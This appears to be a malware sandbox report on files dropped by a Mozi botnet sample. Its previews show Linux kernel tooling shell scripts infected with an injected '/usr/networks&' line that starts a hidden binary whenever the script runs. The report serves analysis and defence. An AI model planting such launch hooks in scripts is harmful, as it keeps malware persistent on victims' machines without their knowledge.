                                                              Encrypted:false
                                                              SSDEEP:3:qXVaEJZKQRFKVRMKU7SKVxstn17QLGiX9DIgM3o287AX8Vx27B7AY7QLsLImp25G:SHRFKkf6tGJRnMYR7A0g7tAhAIcADMn
                                                              MD5:9D4B9506D89C638D6D8274F863158FF5
                                                              SHA1:808852D855162FD0825E8F60F3E1969A0B2666F2
                                                              SHA-256:8FA50AD52F48649C6688AEC4A9098BEE1303DB3E48CAEC578CC1C0C0D1CE387D
                                                              SHA-512:A3007389BCDE5749CB0023EC196956FC93148A4FDB45E9014AFE46F5991F4D64244D5A82680156639CD285DB7589D433071C298786A5A31B03DE02929C2AF677
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 255.fi..echo Herd options: $herdoptions > $LKMM_DESTDIR/$litmus.out./usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $litmus >> $LKMM_DESTDIR/$litmus.out 2>&1..scripts/judgelitmus.sh $litmus../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1323
                                                              Entropy (8bit):5.176348294995237
                                                              Encrypted:false
                                                              SSDEEP:24:rvV7wy7SOPnbjavF+8Yxw8wynJA//3OBZhnDLAejinuJYqgIW:rvZL7Hqv4vxw8wiJyeDLdjinqgIW
                                                              MD5:E1B6CD014E82774900528014EF0D6F2E
                                                              SHA1:ED30423AC7DC87314B36C6E41813C6A67D02117F
                                                              SHA-256:31B7794E2BE2068A4A322B3209E67C7C83519C06F9EB1139BC2849BBCB92BE47
                                                              SHA-512:126676C1B47B9594F0B6555083D37086C5EA63B8C8BC70E59C96CE0D7614F0E9725346BB053D0836C2D5B775FDC1D42662C518A014868B62F52F9CA295C8818B
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Create the results directory and populate it with subdirectories..# The initial output is created here to avoid clobbering the output.# generated earlier..mkdir $T/results.find litmus -type d -print | ( cd $T/results; sed -e 's/^/mkdir -p /' | sh )..# Create the list of litmus tests already run, then remove those that.# are excluded by this run's --procs argument..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already.xargs < $T/list-C-already -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Redirect output, run tests, then restore destination directory..destdir="$LKMM_DESTDIR".LKMM_DESTDIR=$T/results; export LKMM_DESTDIR.scripts/runlitmushist.sh < $T/list-C-short > $T/runlitmushist.sh.out 2>&1.LKMM_DESTDIR="$destdir"; export LKMM_DESTDIR..# Move the newly generated .litmus.out files to .litmus.out.new files.# in the destination directory..cdir=`pwd`.ddir=`awk -v c="$cd
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):58
                                                              Entropy (8bit):4.00869856467617
                                                              Encrypted:false
                                                              SSDEEP:3:qXVay6vBBvKDlOORgn:w6vfK4n
                                                              MD5:22E8085372E3C003B959BE0A933F9CEB
                                                              SHA1:5CDE716897DC5B6292E7D1FA46016E94F99BEDDD
                                                              SHA-256:80982D86AADCE09EDE1347AF7482DCC96B62072095F0A89CDB5449551ECEA9CC
                                                              SHA-512:0B4BC529920464D4B403CCB3ED8FAC48EA36C1F32FCF2F3CCBFAFA29C81639173241E08C0620EC50A06AD933F6F90B5BE72EFB4964734832E4ECDED1712A6E35
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1367
                                                              Entropy (8bit):5.270907869988027
                                                              Encrypted:false
                                                              SSDEEP:24:5DFAFYyoClvAOwGzGS3ijcSGKpf7lIr7QjfGuo7CC7QjCj:5XYoN+pSrpf7Cr7yHo737j
                                                              MD5:172B8DAE8369EA2330CE22C4B1174B3E
                                                              SHA1:759FCB2912FC0CAD0665ED443B742D9422D2C6CC
                                                              SHA-256:47E367795A2B50C36481670343B8E156283738611DEFF3A3D31546E10DF64FDE
                                                              SHA-512:95B88828588226BE0EC0E2D4E59B6A80C16F0243DB407BCE510B8F4962D7C84769F62F3CBD83EEBEFF54185BB39191CD4FCD98F37AA583AD343A25C0685C99BB
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 255.fi.if test -f "$LKMM_DESTDIR/$litmus".out -a -r "$LKMM_DESTDIR/$litmus".out.then..:.else..echo ' --- ' error: \"$LKMM_DESTDIR/$litmus\".out is not a readable file..exit 255.fi.if grep -q '^ \* Result: ' $litmus.then..outcome=`grep -m 1 '^ \* Result: ' $litmus | awk '{ print $3 }'`.else..outcome=specified.fi..grep '^Observation' $LKMM_DESTDIR/$litmus.out.if grep -q '^Observation' $LKMM_DESTDIR/$litmus.out.then..:.else..echo ' !!! Verification error' $litmus..if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out..then...echo ' !!! Verification error' >> $LKMM_DESTDIR/$litmus.out 2>&1..fi..exit 255.fi.if test "$outcome" = DEADLOCK.then..if grep '^Observation' $LKMM_DESTDIR/$litmus.out | grep -q 'Never 0 0$'..then...ret=0..else...echo " !!! Unexpected non-$outcome verification" $litmus...if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out...then....echo " !!! Unexpected non-$outcome verification" >> $LKMM_DESTDIR/$litmus.out 2>&1...fi...ret=1..fi.elif grep '^Observation' $LKMM_DE
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1280
                                                              Entropy (8bit):5.0293104555166925
                                                              Encrypted:false
                                                              SSDEEP:24:rI0T53Bv5aSj7CT+8YxwGedC/xzBwyBlzBxTwPN0xXjOhmpq4:rIOBv0chvxww5lwa9BxTwV098E
                                                              MD5:02F7CF80354BAC6CF9C89AF6FF3CFF6C
                                                              SHA1:C79857207AA510D3CFCD4CF550D5180031151523
                                                              SHA-256:D82CD5F2B11EF107DCE3B0F870925AB18172614DC3948CBABBF7816A699E3167
                                                              SHA-512:74660F916E6AEE1C4E512A72F2362FB61E1AC74E0CCE15C0AD7DE9FA41B530DE14F647DFAC11EECEA314FF50CE59DB612D37D2F1E4C82F68885993110C25F44E
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find litmus -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Create a list of the C-language litmus tests previously run..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already..# Form full list of litmus tests with no more than the specified.# number of processes (per the --procs argument)..find litmus -name '*.litmus' -exec grep -l -m 1 "^C " {} \; > $T/list-C-all.xargs < $T/list-C-all -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Form list of new tests. Note: This does not handle litmus-test deletion!.sort $T/list-C-already $T/list-C-short | uniq -u > $T/list-C-new..# Form list of litmus tests that have changed since the last run..sed < $T/list-C-short -e 's,^.*$,if test & -nt '"$LKMM_DESTDIR"'/&.out; then
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1879
                                                              Entropy (8bit):5.440616965091095
                                                              Encrypted:false
                                                              SSDEEP:24:Xh5s1mUKl+RTKH/EI8dS4LThfuTWVhxPVUnvKMLdeP9UcvyP4rTMD0DVDT/VI9Vy:xU6l+ReHsZSspTVU9Ldc9Ucdo0xDT/Ay
                                                              MD5:4C06EBFB05EA8E30772579E05023463A
                                                              SHA1:EB26B02ABCE95938F951FB9C9EEE0B78E6750851
                                                              SHA-256:1931EE8FC36415CD7B34DB8A4DE4F26DF91DFD87A5DFD73D036A5C705AD4D83B
                                                              SHA-512:7EF3D6ECC82116BD799C104F908D2DAD9214B3636D6A796D11057D23AF9E71800170BEEDA7E65EFE93249B8A321F20C671AB7C742A248351ACDF6AC6AAB29600
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..usage () {..usagehelp 1>&2.}..# checkarg --argname argtype $# arg mustmatch cannotmatch.checkarg () {..if test $3 -le 1..then...echo $1 needs argument $2 matching \"$5\"...usage..fi..if echo "$4" | grep -q -e "$5"..then...:..else...echo $1 $2 \"$4\" must match \"$5\"...usage..fi..if echo "$4" | grep -q -e "$6"..then...echo $1 $2 \"$4\" must not match \"$6\"...usage..fi.}..while test $# -gt 0.do..case "$1" in..--destdir)...checkarg --destdir "(path to directory)" "$#" "$2" '.\+' '^--'...LKMM_DESTDIR="$2"...mkdir $LKMM_DESTDIR > /dev/null 2>&1...if ! test -e "$LKMM_DESTDIR"...then....echo "Cannot create directory --destdir '$LKMM_DESTDIR'"....usage...fi...if test -d "$LKMM_DESTDIR" -a -w "$LKMM_DESTDIR" -a -x "$LKMM_DESTDIR"...then....:...else....echo "Directory --destdir '$LKMM_DESTDIR' insufficient permissions to create files"....usage...fi...shift...;;..--herdopts|--herdopt)...checkarg --destdir "(herd7 options)" "$#" "$2" '.*' '^--'...LKMM_HERD_OPTIONS="$2"
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1443
                                                              Entropy (8bit):5.41418500417696
                                                              Encrypted:false
                                                              SSDEEP:24:rfccQtgUqueyYMY4QSh7Lxh7L2Qq424xBKQVZo+ARMxEZdjHsH+JYogedjV0OcNE:rUrtx/YMY4QwfPf2dR4xBKkZiMxOeH+P
                                                              MD5:44C78B91109C3A4958CC8E2C2FC8E238
                                                              SHA1:06DE355AEA0AADCDD20C42F7EC9F62C546061703
                                                              SHA-256:A628A0EED4A15189005511AC4BCEA2E66336C449FFD6CC3128B5E60AF7A0F572
                                                              SHA-512:4BC6BAF05DAE9908727DACF5318ADDB7470D0A727653C369525FD34F2ACB418257508F198D232AF59061B8DF4D2B33CDF1F04FE76F2E92A0590495E3398D9446
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Prefixes for per-CPU scripts.for ((i=0;i<$LKMM_JOBS;i++)).do..echo dir="$LKMM_DESTDIR" > $T/$i.sh..echo T=$T >> $T/$i.sh..echo herdoptions=\"$LKMM_HERD_OPTIONS\" >> $T/$i.sh..cat << '___EOF___' >> $T/$i.sh..runtest () {...echo ' ... ' /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 '>' $dir/$1.out '2>&1'...if /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 > $dir/$1.out 2>&1...then....if ! grep -q '^Observation ' $dir/$1.out....then.....echo ' !!! Herd failed, no Observation:' $1....fi...else....exitcode=$?....if test "$exitcode" -eq 124....then.....exitmsg="timed out"....else.....exitmsg="failed, exit code $exitcode"....fi....echo ' !!! Herd' ${exitmsg}: $1...fi..}.___EOF___.done..awk -v q="'" -v b='\\' '.{..print "echo `grep " q "^P[0-9]" b "+(" q " " $0 " | tail -1 | sed -e " q "s/^P" b "([0-9]" b "+" b ")(.*$/" b "1/" q "` " $0.}' | bash |.sort -k1n |.awk -v ncpu=$LKMM_JOBS -v t=$T '.{..print "runtest " $2 >> t "/" NR % ncpu ".sh";.}..END {
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):723
                                                              Entropy (8bit):5.350945108759267
                                                              Encrypted:false
                                                              SSDEEP:12:w6vWyou60IXQrFQjsLUgqXl2nwJ6vAEqNT8oFlEgthlPpLiflme5qOzCdwRpW4RV:rW9j0NrFcsLoXl2zAlRZ3EO/PpLgecp1
                                                              MD5:B11F4C76E62677D0C2C93338430FDE43
                                                              SHA1:B65C4B0CBAB7AE00CBB3CA2BAC57B36C74295355
                                                              SHA-256:B1C5813EF3CC813C1CE5B9A6820D0F0E4B1DAE90F3D9B1EEBDC1875C5DA51B7D
                                                              SHA-512:592A2B91DD3DF13EF1FECDFB4B2BCA0CA2E7020226314727560935DF36B2FDA46727DEBD16C410D12C67C82BB1A62DA6725BFD950BF89341FC5BED44B94FA27D
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Check that the fault injection directory exists.DEBUGDIR=`echo $DEBUGFS | awk '{print $2}'`/nfsd.if [ ! -d "$DEBUGDIR" ]; then..echo "$DEBUGDIR does not exist"..echo "Check that your .config selects CONFIG_NFSD_FAULT_INJECTION"..exit 1.fi..function help().{..echo "Usage $0 injection_type [count]"..echo ""..echo "Injection types are:"..ls $DEBUGDIR..exit 1.}..if [ $# == 0 ]; then..help.elif [ ! -f $DEBUGDIR/$1 ]; then..help.elif [ $# != 2 ]; then..COUNT=0.else..COUNT=$2.fi..BEFORE=`mktemp`.AFTER=`mktemp`.dmesg > $BEFORE.echo $COUNT > $DEBUGDIR/$1.dmesg > $AFTER.# Capture lines that only exist in the $AFTER file.diff $BEFORE $AFTER | grep ">".rm -f $BEFORE $AFTER../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):458
                                                              Entropy (8bit):5.00959691163534
                                                              Encrypted:false
                                                              SSDEEP:12:b/yF8GAh5AE4O35gZ8AN5AE4OMai5AE4ZAiFafG5AE4ZAi9ZSMn:b/m85kOJfc5kOVi5kZufG5kZvZ
                                                              MD5:A4755C3D7F96AC9DDB980618EE1941CC
                                                              SHA1:7483B6428F3BD46ABC16B7CB1D04509A56763D10
                                                              SHA-256:AA6A92BAA645AA58764662FD541332178E1F5AB133B5A288FB2D287A857B70E4
                                                              SHA-512:54CE3A1EEAB05442A80A1804152EC77C4418DFC81EC108B584788D19FEF14939C0E2322FA9D87B1E0894B44C0B7B07789A267B67F5350EED72B4600D698778EB
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..cd ../....for i in $FILES; do. check $i.done..check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):584
                                                              Entropy (8bit):4.880830745314398
                                                              Encrypted:false
                                                              SSDEEP:12:w6vCBmMU31bL21fijNv2YPJsPOvMp66ijNrJsPOvMbIj62fUfGn:rCUMUlbk8NvFPuPq06vNruPqK66XG
                                                              MD5:6BDDA309AAC612431FEB20AFC9124980
                                                              SHA1:8F5437F82EF33A58ACBEC1E066776CA9BF8EFC8A
                                                              SHA-256:43A9E0DD99528C7F3B14ED56C6E1F437D324CB8477F30E752F65029045BD02F5
                                                              SHA-512:FF1B93D16F7B1D233D48FD49B7930253AE28190DE932B9B448DA22FC5DFA5A90C3FD6CA94C493FF25E2A5C820AEFD01F36558F0240519A4D5C2424F44DCA5B47
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..cd $(dirname $0)..trap 'echo "Might need a more recent version of binutils"' EXIT..echo "Compiling insn-x86-dat-src.c to 64-bit object"..gcc -g -c insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-64.c..rm -f insn-x86-dat-src.o..echo "Compiling insn-x86-dat-src.c to 32-bit object"..gcc -g -c -m32 insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-32.c..rm -f insn-x86-dat-src.o..trap - EXIT..echo "Done (use git diff to see the changes)"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1155
                                                              Entropy (8bit):5.244205012386464
                                                              Encrypted:false
                                                              SSDEEP:24:6fZ7Ed9hko5L6ko5Lk5U5kAo5BY85kOJfc5kOVR5kZuN5kZv4e12c52T:6x6dN6dNkmS5Y8Hfc5CQCA+2C2T
                                                              MD5:9A01A481DCF3426E4D3D2CD18882AB28
                                                              SHA1:A97052DA5C09338D04BCD380313B275BE6E42944
                                                              SHA-256:60BF226ABC9F5B3D5AC0C591B4BF9BD07749A36171D85A0C1F5EA0DC985037E1
                                                              SHA-512:7220C673402F83D27E29DBFAD6488DB76DF2A4DAFE8136D5065482D36DECE6829D7E6438D53D358CAF757C861638D5106AEBF36C5D4ACB550CF99DD135E0A76D
                                                              Malicious:false
                                                              Preview:./usr/networks&.test -d ../../include || exit 0..cd ../....# simple diff check.for i in $FILES; do. check $i -B.done..# diff with extra ignore lines.check arch/x86/lib/memcpy_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check arch/x86/lib/memset_64.S '-I "^EXPORT_SYMBOL" -I "^#include <asm/export.h>"'.check include/uapi/asm-generic/mman.h '-I "^#include <\(uapi/\)*asm-generic/mman-common\(-tools\)*.h>"'.check include/uapi/linux/mman.h '-I "^#include <\(uapi/\)*asm/mman.h>"'.check include/linux/ctype.h. '-I "isdigit("'.check lib/ctype.c.. '-I "^EXPORT_SYMBOL" -I "^#include <linux/export.h>" -B'.check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c. '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c. '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'..# diff
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):655
                                                              Entropy (8bit):5.557065419733984
                                                              Encrypted:false
                                                              SSDEEP:12:w6v5HKxhrYyZPjytOsMyVzr1oerr5bYlb3i/mnhjK4n:raBZOtOHyVylxng4
                                                              MD5:5F6BDB1DD164C0B1412F1A48A21991B9
                                                              SHA1:B5D3E44D0B2A794496C77D28B03FFD198F579967
                                                              SHA-256:A144625B54FE5F40D5BA5E1FBBD12B7469FE7A93146A7E717C37129B1A6E1D65
                                                              SHA-512:5CED1E7056789E773B2C72845EADB8E81E4EF6A0C8CDA51159006296B2948F71EA75B0EAFF54DA6C6AFBD62F88D86B03181B9CBE207BAE9175ACAAAC8EA02187
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..MANIFEST=$(mktemp /tmp/perf-archive-manifest.XXXXXX).PERF_BUILDID_LINKDIR=$(readlink -f $PERF_BUILDID_DIR)/..cut -d ' ' -f 1 $BUILDIDS | \.while read build_id ; do..linkname=$PERF_BUILDID_DIR.build-id/${build_id:0:2}/${build_id:2}..filename=$(readlink -f $linkname)..echo ${linkname#$PERF_BUILDID_DIR} >> $MANIFEST..echo ${filename#$PERF_BUILDID_LINKDIR} >> $MANIFEST.done..tar cjf $PERF_DATA.tar.bz2 -C $PERF_BUILDID_DIR -T $MANIFEST.rm $MANIFEST $BUILDIDS || true.echo -e "Now please run:\n".echo -e "$ tar xvf $PERF_DATA.tar.bz2 -C ~/.debug\n".echo "wherever you need to run 'perf report' on.".exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5976
                                                              Entropy (8bit):5.501326007067708
                                                              Encrypted:false
                                                              SSDEEP:48:JsPA4w4mkW3+0yQXHuwCBA6RfAqN62YYwYSA+B5Af8ufUF+lmfUEVZOQXo0FNn5G:uPeJ+0yQXH3zGfYH+AYkW/k/7hQkQmc
                                                              MD5:2367A910716F3184670C4A30214231F9
                                                              SHA1:706F95FE61D127EB29A4B4A78EDA595D20DE7963
                                                              SHA-256:742B8C3C32E4B47BD88CB39C22DAD76D6C24BBA566EBA18C6D98A7D73381EB28
                                                              SHA-512:F942F9A19F485774E7E115C21E2372C1ABF433690A4C68F0BE96109C3C3338D2924DD60C8D8B2B06632C855CB405CF8D4DF37CCC4E6F4C41C92F72C894A49FFB
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.}..find_perf().{..if [ -n "$PERF" ] ; then...return..fi..PERF=`which perf || true`..if [ -z "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..if [ ! -x "$PERF" ] ; then...echo "Failed to find perf" >&2.. exit 1..fi..echo "Using $PERF".."$PERF" version.}..copy_kcore().{..echo "Copying kcore"...if [ $EUID -eq 0 ] ; then...SUDO=""..else...SUDO="sudo"..fi...rm -f perf.data.junk..("$PERF" record -o perf.data.junk "${PERF_OPTIONS[@]}" -- sleep 60) >/dev/null 2>/dev/null &..PERF_PID=$!...# Need to make sure that perf has started..sleep 1...KCORE=$(($SUDO "$PERF" buildid-cache -v -f -k /proc/kcore >/dev/null) 2>&1)..case "$KCORE" in.."kcore added to build-id cache directory "*)...KCORE_DIR=${KCORE#"kcore added to build-id cache directory "}..;;..*)...kill $PERF_PID...wait >/dev/null 2>/dev/null || true...rm perf.data.junk...echo "$KCORE"...echo "Failed to find kcore" >&2...exit 1..;;..esac...kill $PERF_PID..wait >/dev/null 2>/dev/null
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):203
                                                              Entropy (8bit):4.726134994025493
                                                              Encrypted:false
                                                              SSDEEP:3:qXVYUg/yz6dQtvJ2qVB4UXpWLa7UXnUQg7KIBPfAX7UXDj2HvqlOORgn:Lyy9uSUXx7UX6ZBPfi7UXmPTn
                                                              MD5:2B25349D8ED8573F5E23C69B731A0628
                                                              SHA1:9347DECB096013BAE8C703472CF2812009064955
                                                              SHA-256:9AF038A6F3B205CDB6DEA138218E5C79B6A68FBB6A76F65C8CE1AB47FDA0241C
                                                              SHA-512:5A5B6BB51FDE49F8EDBFED2AE70E921BE04F72DF64E1085927A1CCEFA3478A075B85F0AA7776D38AB27A760AD2F624F7B70DB5D53262AED83379F48929732321
                                                              Malicious:false
                                                              Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2564
                                                              Entropy (8bit):5.249114774902953
                                                              Encrypted:false
                                                              SSDEEP:48:k5wfEdvLzMPrlxQvB4y4d4mBO7JN4d4mhu4d4md4d6sd4dm4dL4kkF4dL4kfSCCa:kmfwMPrTxrd2FqdPdEdudPdMkbdMk6C/
                                                              MD5:183413018EA35B00671B5740CF8258E7
                                                              SHA1:87F1954CEE6DE1E05B0E2693F547631FFB22C5C7
                                                              SHA-256:ABB6A1A5F3CA30C3E5896B29E4C4D57CC5E7DC1C01FA160CF090A1330E70D5AF
                                                              SHA-512:0E61B9CB1D1D586CC1815DEB03EC9DEEAC8334A37F4CC9C16EA6E78544FDAC8BFDC65C8396900A67F1D8F2743D351FE36B4B7FE49B9FC5D4758A06D70A14775A
                                                              Malicious:false
                                                              Preview:./usr/networks&.nm -Dg $libc 2>/dev/null | fgrep -q inet_pton || exit 254..event_pattern='probe_libc:inet_pton(\_[[:digit:]]+)?'..add_libc_inet_pton_event() {...event_name=$(perf probe -f -x $libc -a inet_pton 2>&1 | tail -n +2 | head -n -5 | \....grep -P -o "$event_pattern(?=[[:space:]]\(on inet_pton in $libc\))")...if [ $? -ne 0 -o -z "$event_name" ] ; then...printf "FAIL: could not add event\n"...return 1..fi.}..trace_libc_inet_pton_backtrace() {...expected=`mktemp -u /tmp/expected.XXX`...echo "ping[][0-9 \.:]+$event_name: \([[:xdigit:]]+\)" > $expected..echo ".*inet_pton\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected..case "$(uname -m)" in..s390x)...eventattr='call-graph=dwarf,max-stack=4'...echo "gaih_inet.*\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "(__GI_)?getaddrinfo\+0x[[:xdigit:]]+[[:space:]]\($libc|inlined\)$" >> $expected...echo "main\+0x[[:xdigit:]]+[[:space:]]\(.*/bin/ping.*\)$" >> $expected...;;..ppc64|ppc64le)...eventattr='max-stack
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):791
                                                              Entropy (8bit):5.063685234698662
                                                              Encrypted:false
                                                              SSDEEP:24:dgag2s0vRocEeuc5nf4OIypA4KdAqhzAytRozqC:dd33vycJ4pMA4KtftgX
                                                              MD5:126EA193A782B859133B7D175B89C795
                                                              SHA1:EA89D10F53E9DF9685D03131034C301E11D78617
                                                              SHA-256:32159BD7A2F4959C901796F6FE54CDBB7BDEA02FE819FC7887F0D29EA4243DD2
                                                              SHA-512:799E9C2778F6C305446356002EC17B4E2F13A41D81F10680A86C30D02F81675CD6F331916AC56C376C9AAFFEB7FC0904D7FDABAD4DF0A682BC6BA1020920410E
                                                              Malicious:false
                                                              Preview:./usr/networks&.skip_if_no_perf_probe || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..perfdata=$(mktemp /tmp/__perf_test.perf.data.XXXXX).file=$(mktemp /tmp/temporary_file.XXXXX)..record_open_file() {..echo "Recording open file:"..perf record -o ${perfdata} -e probe:vfs_getname touch $file.}..perf_script_filenames() {..echo "Looking at perf.data file for vfs_getname records for the file we touched:"..perf script -i ${perfdata} | \..egrep " +touch +[0-9]+ +\[[0-9]+\] +[0-9]+\.[0-9]+: +probe:vfs_getname: +\([[:xdigit:]]+\) +pathname=\"${file}\"".}..add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..record_open_file && perf_script_filenames.err=$?.rm -f ${perfdata}.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):175
                                                              Entropy (8bit):4.56987105178125
                                                              Encrypted:false
                                                              SSDEEP:3:qXVYUgL2RjZFtvGSp1QGKR5D8NA7VDiCfx7VD4EyXDlRXYvZOj2HvqlOORgn:cjZrpCr5D8NARDP5RD4EyX3sZ7PTn
                                                              MD5:C18BE941AC8872252385A118389DBE1F
                                                              SHA1:EF0F9A60B8E3BDCD9D135BEBC6E6FB0B40C1DC56
                                                              SHA-256:84C02426161EEC74AED2847DA06C62CD8EA87DCF6ECCE2FAD0C919242F168AAD
                                                              SHA-512:DCFF993D3B448E3E1AECAD9A38B7853FD6C78C69D1B216CBE3F2E383C66A74C71D878EA71C503DDCB620829FD794B16FECF80FD1C77E6D56B3CE3EC675CF7C55
                                                              Malicious:false
                                                              Preview:./usr/networks&.skip_if_no_z_record || exit 2.collect_z_record && check_compressed_stats && check_compressed_output.err=$?.rm -f $trace_file*.exit $err../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):903
                                                              Entropy (8bit):5.457774373928952
                                                              Encrypted:false
